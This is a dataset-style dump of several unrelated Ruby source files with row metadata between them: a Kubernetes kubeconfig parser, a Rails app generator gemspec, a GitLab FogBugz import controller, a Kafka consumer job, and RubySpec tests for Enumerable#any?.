from_email)
end
end
end
| 30.028302 | 143 | 0.545712 |
33302b812e233027bbdad210673dd2a629336387 | 8,069 | # frozen_string_literal: true
require 'dry-struct'
require 'dry-types'
require 'base64'
require 'yaml'
module K8s
# Common struct type for kubeconfigs:
#
# * converts string keys to symbols
# * normalizes foo-bar to foo_bar
class ConfigStruct < Dry::Struct
transform_keys do |key|
case key
when String
key.tr('-', '_').to_sym
else
key
end
end
end
# @see https://godoc.org/k8s.io/client-go/tools/clientcmd/api/v1#Config
class Config < ConfigStruct
# Common dry-types for config
class Types
include Dry::Types()
end
# structured cluster
class Cluster < ConfigStruct
attribute :server, Types::String
attribute :insecure_skip_tls_verify,
Types::Bool.optional.default(nil, shared: true)
attribute :certificate_authority,
Types::String.optional.default(nil, shared: true)
attribute :certificate_authority_data,
Types::String.optional.default(nil, shared: true)
attribute :extensions,
Types::Strict::Array.optional.default(nil, shared: true)
end
# structured cluster with name
class NamedCluster < ConfigStruct
attribute :name, Types::String
attribute :cluster, Cluster
end
# structured user auth provider
class UserAuthProvider < ConfigStruct
attribute :name, Types::String
attribute :config, Types::Strict::Hash
end
# structured user exec
class UserExec < ConfigStruct
attribute :command, Types::String
attribute :apiVersion, Types::String
attribute :env, Types::Strict::Array.of(Types::Hash).optional.default(nil)
attribute :args, Types::Strict::Array.of(Types::String).optional.default(nil, shared: true)
end
# structured user
class User < ConfigStruct
attribute :client_certificate, Types::String.optional.default(nil, shared: true)
attribute :client_certificate_data, Types::String.optional.default(nil, shared: true)
attribute :client_key, Types::String.optional.default(nil, shared: true)
attribute :client_key_data, Types::String.optional.default(nil, shared: true)
attribute :token, Types::String.optional.default(nil, shared: true)
attribute :tokenFile, Types::String.optional.default(nil, shared: true)
attribute :as, Types::String.optional.default(nil, shared: true)
attribute :as_groups, Types::Array.of(Types::String).optional.default(nil, shared: true)
attribute :as_user_extra, Types::Hash.optional.default(nil, shared: true)
attribute :username, Types::String.optional.default(nil, shared: true)
attribute :password, Types::String.optional.default(nil, shared: true)
attribute :auth_provider, UserAuthProvider.optional.default(nil, shared: true)
attribute :exec, UserExec.optional.default(nil, shared: true)
attribute :extensions, Types::Strict::Array.optional.default(nil, shared: true)
end
# structured user with name
class NamedUser < ConfigStruct
attribute :name, Types::String
attribute :user, User
end
# structured context
#
# Referrs to other named User/cluster objects within the same config.
class Context < ConfigStruct
attribute :cluster, Types::Strict::String
attribute :user, Types::Strict::String
attribute :namespace, Types::Strict::String.optional.default(nil, shared: true)
attribute :extensions, Types::Strict::Array.optional.default(nil, shared: true)
end
# named context
class NamedContext < ConfigStruct
attribute :name, Types::String
attribute :context, Context
end
attribute :kind, Types::Strict::String.optional.default(nil, shared: true)
attribute :apiVersion, Types::Strict::String.optional.default(nil, shared: true)
attribute :preferences, Types::Strict::Hash.optional.default(proc { {} }, shared: true)
attribute :clusters, Types::Strict::Array.of(NamedCluster).optional.default(proc { [] }, shared: true)
attribute :users, Types::Strict::Array.of(NamedUser).optional.default(proc { [] }, shared: true)
attribute :contexts, Types::Strict::Array.of(NamedContext).optional.default(proc { [] }, shared: true)
attribute :current_context, Types::Strict::String.optional.default(nil, shared: true)
attribute :extensions, Types::Strict::Array.optional.default(proc { [] }, shared: true)
# Loads a configuration from a YAML file
#
# @param path [String]
# @return [K8s::Config]
def self.load_file(path)
new(YAML.safe_load(
File.read(File.expand_path(path)),
permitted_classes: [Time, DateTime, Date],
permitted_symbols: [],
aliases: true
))
end
# Loads configuration files listed in KUBE_CONFIG environment variable and
# merge using the configuration merge rules, @see K8s::Config.merge
#
# @param kubeconfig [String] by default read from ENV['KUBECONFIG']
def self.from_kubeconfig_env(kubeconfig = nil)
kubeconfig ||= ENV.fetch('KUBECONFIG', '')
raise ArgumentError, "KUBECONFIG not set" if kubeconfig.empty?
paths = kubeconfig.split(/(?!\\):/)
paths.inject(load_file(paths.shift)) do |memo, other_cfg|
memo.merge(load_file(other_cfg))
end
end
# Build a minimal configuration from at least a server address, server certificate authority data and an access token.
#
# @param server [String] kubernetes server address
# @param ca [String] server certificate authority data (base64 encoded)
# @param token [String] access token
# @param cluster_name [String] cluster name
# @param user [String] user name
# @param context [String] context name
# @param options [Hash] (see #initialize)
def self.build(server:, ca:, auth_token:, cluster_name: 'kubernetes', user: 'k8s-client', context: 'k8s-client', **options)
new(
{
clusters: [{ name: cluster_name, cluster: { server: server, certificate_authority_data: ca } }],
users: [{ name: user, user: { token: auth_token } }],
contexts: [{ name: context, context: { cluster: cluster_name, user: user } }],
current_context: context
}.merge(options)
)
end
# Merges configuration according to the rules specified in
# https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#merging-kubeconfig-files
#
# @param other [Hash, K8s::Config]
# @return [K8s::Config]
def merge(other)
old_attributes = attributes
other_attributes = other.is_a?(Hash) ? other : other.attributes
old_attributes.merge!(other_attributes) do |key, old_value, new_value|
case key
when :clusters, :contexts, :users
old_value + new_value.reject do |new_mapping|
old_value.any? { |old_mapping| old_mapping[:name] == new_mapping[:name] }
end
else
case old_value
when Array
(old_value + new_value).uniq
when Hash
old_value.merge(new_value) do |_key, inner_old_value, inner_new_value|
inner_old_value.nil? ? inner_new_value : inner_old_value
end
when NilClass
new_value
else
old_value
end
end
end
self.class.new(old_attributes)
end
# @param name [String]
# @raise [K8s::Error::Configuration]
# @return [K8s::Config::Context]
def context(name = current_context)
found = contexts.find{ |context| context.name == name }
raise K8s::Error::Configuration, "context not found: #{name.inspect}" unless found
found.context
end
# @param name [String]
# @return [K8s::Config::Cluster]
def cluster(name = context.cluster)
clusters.find{ |cluster| cluster.name == name }.cluster
end
# @param name [String]
# @return [K8s::Config::User]
def user(name = context.user)
users.find{ |user| user.name == name }.user
end
end
end
| 37.013761 | 127 | 0.66489 |
38ff40e86107f9b7c8fd48b27b200578318680d2 | 1,273 | # -*- encoding: utf-8 -*-
$:.push File.expand_path('../lib', __FILE__)
require 'suspenders/version'
require 'date'
Gem::Specification.new do |s|
s.required_ruby_version = ">= #{Suspenders::RUBY_VERSION}"
s.authors = ['thoughtbot', 'kiramclean']
s.date = Date.today.strftime('%Y-%m-%d')
s.description = <<-HERE
This is a base Rails project that you can upgrade. It's forked from Thoughbot's
suspenders gem. I use to get a head start on building a working app. Use
Suspenders if you're in a rush to build something amazing; don't use it
if you like missing deadlines.
HERE
s.email = '[email protected]'
s.executables = ['kiras-suspenders']
s.extra_rdoc_files = %w[README.md LICENSE]
s.files = `git ls-files`.split("\n")
s.homepage = 'https://github.com/kiramclean/kiras-suspenders'
s.license = 'MIT'
s.name = 'kiras-suspenders'
s.rdoc_options = ['--charset=UTF-8']
s.require_paths = ['lib']
s.summary = "Generate a Rails app using thoughtbot's best practices and my custom defaults."
s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
s.version = Suspenders::VERSION
s.add_dependency 'bundler', '~> 1.3'
s.add_dependency 'rails', Suspenders::RAILS_VERSION
s.add_development_dependency 'rspec', '~> 3.2'
end
| 35.361111 | 94 | 0.696779 |
28ead8d44dac0f93a334939a04f21da39ea20183 | 2,934 | # frozen_string_literal: true
class Import::FogbugzController < Import::BaseController
before_action :verify_fogbugz_import_enabled
before_action :user_map, only: [:new_user_map, :create_user_map]
rescue_from Fogbugz::AuthenticationException, with: :fogbugz_unauthorized
def new
end
def callback
begin
res = Gitlab::FogbugzImport::Client.new(import_params.to_h.symbolize_keys)
rescue
# If the URI is invalid various errors can occur
return redirect_to new_import_fogbugz_path, alert: _('Could not connect to FogBugz, check your URL')
end
session[:fogbugz_token] = res.get_token
session[:fogbugz_uri] = params[:uri]
redirect_to new_user_map_import_fogbugz_path
end
def new_user_map
end
def create_user_map
user_map = user_map_params.to_h[:users]
unless user_map.is_a?(Hash) && user_map.all? { |k, v| !v[:name].blank? }
flash.now[:alert] = _('All users must have a name.')
return render 'new_user_map'
end
session[:fogbugz_user_map] = user_map
flash[:notice] = _('The user map has been saved. Continue by selecting the projects you want to import.')
redirect_to status_import_fogbugz_path
end
# rubocop: disable CodeReuse/ActiveRecord
def status
unless client.valid?
return redirect_to new_import_fogbugz_path
end
@repos = client.repos
@already_added_projects = find_already_added_projects('fogbugz')
already_added_projects_names = @already_added_projects.pluck(:import_source)
@repos.reject! { |repo| already_added_projects_names.include? repo.name }
end
# rubocop: enable CodeReuse/ActiveRecord
def jobs
render json: find_jobs('fogbugz')
end
def create
repo = client.repo(params[:repo_id])
fb_session = { uri: session[:fogbugz_uri], token: session[:fogbugz_token] }
umap = session[:fogbugz_user_map] || client.user_map
project = Gitlab::FogbugzImport::ProjectCreator.new(repo, fb_session, current_user.namespace, current_user, umap).execute
if project.persisted?
render json: ProjectSerializer.new.represent(project)
else
render json: { errors: project_save_error(project) }, status: :unprocessable_entity
end
end
private
def client
@client ||= Gitlab::FogbugzImport::Client.new(token: session[:fogbugz_token], uri: session[:fogbugz_uri])
end
def user_map
@user_map ||= begin
user_map = client.user_map
stored_user_map = session[:fogbugz_user_map]
user_map.update(stored_user_map) if stored_user_map
user_map
end
end
def fogbugz_unauthorized(exception)
redirect_to new_import_fogbugz_path, alert: exception.message
end
def import_params
params.permit(:uri, :email, :password)
end
def user_map_params
params.permit(users: %w(name email gitlab_user))
end
def verify_fogbugz_import_enabled
render_404 unless fogbugz_import_enabled?
end
end
| 26.672727 | 125 | 0.730402 |
088e49f803b4838639aaf29290b32ba3e6e9c2cc | 4,327 | require 'date'
class ConsumerJob < ApplicationJob
def perform(params)
puts "performing job"
kafka = KAFKA_CLUSTERS[params[:cluster_name]]
# k = KafkaCluster.find_by(name: params[:cluster_name])
# kafka = Kafka.new(k.broker_uri.split(","), client_id: "KafkaMan", logger: Rails.logger)
cluster_name = params[:cluster_name]
topic = params[:topic]
message_type = params[:message_type]
key_type = params[:key_type]
start_filter = params[:start_filter]
start_filter_value = params[:start_filter_value]
options = {}
if start_filter == 'consumer-group'
consumer = kafka.consumer(group_id: start_filter_value)
consumer.subscribe(topic, start_from_beginning: false)
else
consumer = kafka
options[:topic] = topic
options[:start_from_beginning] = true
end
if start_filter == 'latest'
options[:start_from_beginning] = false
end
checks = {}
checks[:message_type] = message_type
checks[:key_type] = key_type
if start_filter == 'offset'
checks[:offset] = start_filter_value
elsif start_filter == 'previous-x'
previous_offset = kafka.last_offsets_for(topic)[topic]
previous_offset.keys.each do |partition|
previous_offset[partition] = previous_offset[partition].to_i - start_filter_value.to_i
end
checks[:previous_offset] = previous_offset
end
if start_filter == 'today'
checks[:today] = DateTime.now.midnight
elsif start_filter == 'last-hour'
checks[:last_hour] = DateTime.now - (1/24.0)
elsif start_filter == 'specific-date'
checks[:date] = start_filter_value
end
consumer_key = "consumer_#{cluster_name}_#{topic}_#{message_type}_#{key_type}_#{start_filter}_#{start_filter_value}"
RUNNING_CONSUMERS[consumer_key] = consumer
consumer.each_message(**options) do |message|
if start_filter(checks: checks, message: message) && message_filter('key', value: checks[:key_type], message: message.key) && message_filter('value', value: checks[:message_type], message: message.value)
ActionCable.server.broadcast consumer_key, {
value: message.value,
partition: message.partition,
key: message.key,
headers: message.headers,
offset: message.offset,
creation_timestamp: message.create_time
}
end
end
puts "Consumer stopped : #{consumer_key}"
end
def start_filter(checks: , message: )
if checks[:offset].present?
return message.offset >= checks[:offset].to_i
elsif checks[:previous_offset].present?
return message.offset > checks[:previous_offset][message.partition]
elsif checks[:today].present?
return DateTime.parse(message.create_time.to_s) >= checks[:today]
elsif checks[:last_hour].present?
return DateTime.parse(message.create_time.to_s) >= checks[:last_hour]
elsif checks[:date].present?
return DateTime.parse(message.create_time.to_s) >= DateTime.parse(checks[:date])
else
return true
end
end
def message_filter(type , value: , message: )
if value == 'json'
return valid_json?(message)
elsif value == 'xml'
return valid_xml?(message)
elsif value == 'number'
return valid_number?(message)
elsif value == 'bytes'
# TODO: Do byte conversion
return true
else
return true
end
end
def valid_json?(json)
JSON.parse(json)
return true
rescue JSON::ParserError => e
return false
end
def valid_xml?(xml)
begin
Hash.from_xml(xml)
return true
rescue => exception
return false
end
end
def valid_number?(number)
begin
Float(number)
return true
rescue
return false
end
end
end | 34.070866 | 215 | 0.584932 |
014bbe50a7bb34a384f285ea75a3cfa26c81f34e | 207 | class CreateProductsTaxons < ActiveRecord::Migration
def change
add_column :spree_products_taxons, :id, :primary_key
add_column :spree_products_taxons, :position, :integer, :default => 0
end
end
| 29.571429 | 73 | 0.768116 |
4a7511f64930f2b1118f69e6aaa3c102914019cb | 4,641 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
describe "Enumerable#any?" do
before :each do
@enum = EnumerableSpecs::Numerous.new
@empty = EnumerableSpecs::Empty.new()
@enum1 = [0, 1, 2, -1]
@enum2 = [nil, false, true]
end
it "always returns false on empty enumeration" do
@empty.any?.should == false
@empty.any? { nil }.should == false
[].any?.should == false
[].any? { false }.should == false
{}.any?.should == false
{}.any? { nil }.should == false
end
it "raises an ArgumentError when any arguments provided" do
lambda { @enum.any?(Proc.new {}) }.should raise_error(ArgumentError)
lambda { @enum.any?(nil) }.should raise_error(ArgumentError)
lambda { @empty.any?(1) }.should raise_error(ArgumentError)
lambda { @enum1.any?(1) {} }.should raise_error(ArgumentError)
lambda { @enum2.any?(1, 2, 3) {} }.should raise_error(ArgumentError)
end
it "does not hide exceptions out of #each" do
lambda {
EnumerableSpecs::ThrowingEach.new.any?
}.should raise_error(RuntimeError)
lambda {
EnumerableSpecs::ThrowingEach.new.any? { false }
}.should raise_error(RuntimeError)
end
describe "with no block" do
it "returns true if any element is not false or nil" do
@enum.any?.should == true
@enum1.any?.should == true
@enum2.any?.should == true
EnumerableSpecs::Numerous.new(true).any?.should == true
EnumerableSpecs::Numerous.new('a','b','c').any?.should == true
EnumerableSpecs::Numerous.new('a','b','c', nil).any?.should == true
EnumerableSpecs::Numerous.new(1, nil, 2).any?.should == true
EnumerableSpecs::Numerous.new(1, false).any?.should == true
EnumerableSpecs::Numerous.new(false, nil, 1, false).any?.should == true
EnumerableSpecs::Numerous.new(false, 0, nil).any?.should == true
end
it "returns false if all elements are false or nil" do
EnumerableSpecs::Numerous.new(false).any?.should == false
EnumerableSpecs::Numerous.new(false, false).any?.should == false
EnumerableSpecs::Numerous.new(nil).any?.should == false
EnumerableSpecs::Numerous.new(nil, nil).any?.should == false
EnumerableSpecs::Numerous.new(nil, false, nil).any?.should == false
end
it "gathers whole arrays as elements when each yields multiple" do
multi = EnumerableSpecs::YieldsMultiWithFalse.new
multi.any?.should be_true
end
end
describe "with block" do
it "returns true if the block ever returns other than false or nil" do
@enum.any? { true }.should == true
@enum.any? { 0 }.should == true
@enum.any? { 1 }.should == true
@enum1.any? { Object.new }.should == true
@enum1.any?{ |o| o < 1 }.should == true
@enum1.any?{ |o| 5 }.should == true
@enum2.any? { |i| i == nil }.should == true
end
it "any? should return false if the block never returns other than false or nil" do
@enum.any? { false }.should == false
@enum.any? { nil }.should == false
@enum1.any?{ |o| o < -10 }.should == false
@enum1.any?{ |o| nil }.should == false
@enum2.any? { |i| i == :stuff }.should == false
end
it "stops iterating once the return value is determined" do
yielded = []
EnumerableSpecs::Numerous.new(:one, :two, :three).any? do |e|
yielded << e
false
end.should == false
yielded.should == [:one, :two, :three]
yielded = []
EnumerableSpecs::Numerous.new(true, true, false, true).any? do |e|
yielded << e
e
end.should == true
yielded.should == [true]
yielded = []
EnumerableSpecs::Numerous.new(false, nil, false, true, false).any? do |e|
yielded << e
e
end.should == true
yielded.should == [false, nil, false, true]
yielded = []
EnumerableSpecs::Numerous.new(1, 2, 3, 4, 5).any? do |e|
yielded << e
e
end.should == true
yielded.should == [1]
end
it "does not hide exceptions out of the block" do
lambda {
@enum.any? { raise "from block" }
}.should raise_error(RuntimeError)
end
it "gathers initial args as elements when each yields multiple" do
multi = EnumerableSpecs::YieldsMulti.new
multi.any? {|e| e == 1 }.should be_true
end
it "yields multiple arguments when each yields multiple" do
multi = EnumerableSpecs::YieldsMulti.new
yielded = []
multi.any? {|e, i| yielded << [e, i] }
yielded.should == [[1, 2]]
end
end
end
| 32.683099 | 87 | 0.615385 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.